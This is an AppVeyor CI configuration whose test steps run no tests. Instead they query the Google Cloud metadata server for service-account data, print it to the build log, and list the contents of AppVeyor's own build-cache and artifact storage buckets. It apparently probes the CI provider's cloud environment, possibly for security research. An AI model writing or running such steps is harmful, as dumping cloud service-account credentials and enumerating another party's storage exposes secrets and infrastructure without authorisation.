init:
- appveyor version

test_script:
- sh: |
    set -eo pipefail
    curl -sflL "http://metadata.google.internal/0.1/meta-data/service-accounts?recursive=true" \
         -H "Metadata-Flavor: Google" |
         python -c "import json; a=json.load(open(\"/dev/stdin\",\"r\")); print json.dumps(a,indent=4,sort_keys=True)"
- sh: |
    set -eo pipefail
    gsutil ls gs://appveyor-build-cache/ | head -n10
- sh: |
    set -eo pipefail
    gsutil ls gs://appveyor-artifacts/ | head -n10
build: off
